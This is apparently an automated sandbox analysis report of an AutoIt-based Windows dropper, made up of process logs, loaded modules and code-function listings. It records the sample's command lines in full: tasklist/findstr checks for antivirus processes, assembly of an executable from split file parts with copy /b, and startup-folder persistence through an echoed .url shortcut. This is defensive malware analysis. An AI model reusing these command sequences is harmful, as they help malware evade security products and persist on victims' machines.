Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00118E4410_2_00118E44
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00130EB710_2_00130EB7
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000E6FE610_2_000E6FE6
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D33B710_2_000D33B7
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000DF40910_2_000DF409
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000CD45D10_2_000CD45D
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000CF62810_2_000CF628
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000B166310_2_000B1663
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000BF6A010_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D16B410_2_000D16B4
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D78C310_2_000D78C3
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D1BA810_2_000D1BA8
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000DDBA510_2_000DDBA5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000E9CE510_2_000E9CE5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000CDD2810_2_000CDD28
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D1FC010_2_000D1FC0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000DBFD610_2_000DBFD6
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D6B02015_2_00D6B020
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D694E015_2_00D694E0
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D69C8015_2_00D69C80
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D823F515_2_00D823F5
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DE840015_2_00DE8400
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D9650215_2_00D96502
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D6E6F015_2_00D6E6F0
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D9265E15_2_00D9265E
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D8282A15_2_00D8282A
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D989BF15_2_00D989BF
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D96A7415_2_00D96A74
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DE0A3A15_2_00DE0A3A
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D70BE015_2_00D70BE0
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DBEDB215_2_00DBEDB2
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D8CD5115_2_00D8CD51
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DE0EB715_2_00DE0EB7
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DC8E4415_2_00DC8E44
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D96FE615_2_00D96FE6
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D833B715_2_00D833B7
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D7D45D15_2_00D7D45D
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D8F40915_2_00D8F409
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D816B415_2_00D816B4
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D6F6A015_2_00D6F6A0
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D6166315_2_00D61663
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D7F62815_2_00D7F628
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D878C315_2_00D878C3
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D81BA815_2_00D81BA8
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D8DBA515_2_00D8DBA5
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D99CE515_2_00D99CE5
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D7DD2815_2_00D7DD28
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D8BFD615_2_00D8BFD6
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D81FC015_2_00D81FC0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: String function: 00D71A36 appears 34 times
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: String function: 00D80D17 appears 70 times
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: String function: 00D88B30 appears 42 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: String function: 000C1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: String function: 000D0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: String function: 000D8B30 appears 42 times
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal92.expl.evad.winEXE@28/18@2/0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011A6AD GetLastError,FormatMessageW,10_2_0011A6AD
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00108DE9 AdjustTokenPrivileges,CloseHandle,10_2_00108DE9
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00109399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00109399
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DB8DE9 AdjustTokenPrivileges,CloseHandle,15_2_00DB8DE9
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DB9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_00DB9399
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00114148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00114148
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,10_2_0011443D
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifFile created: C:\Users\user\AppData\Local\TradeOptimize DynamicsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_03
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsn1295.tmpJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeVirustotal: Detection: 16%
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 182349
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "RefundAlienConservativeChapters" Coral
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cause + ..\Shopper + ..\Edges + ..\Zinc + ..\Correlation + ..\Wearing + ..\Provision + ..\Res l
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif Beginners.pif l
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\z"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 182349Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "RefundAlienConservativeChapters" Coral Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cause + ..\Shopper + ..\Edges + ..\Zinc + ..\Correlation + ..\Wearing + ..\Provision + ..\Res lJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif Beginners.pif lJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\z"Jump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D8B75 push ecx; ret 10_2_000D8B88
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000CCBDB push eax; retf 10_2_000CCBF8
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D88B75 push ecx; ret 15_2_00D88B88

Persistence and Installation Behavior

barindex
Drops PE files with a suspicious file extension
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifFile created: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifFile created: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.urlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_001359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_001359B3
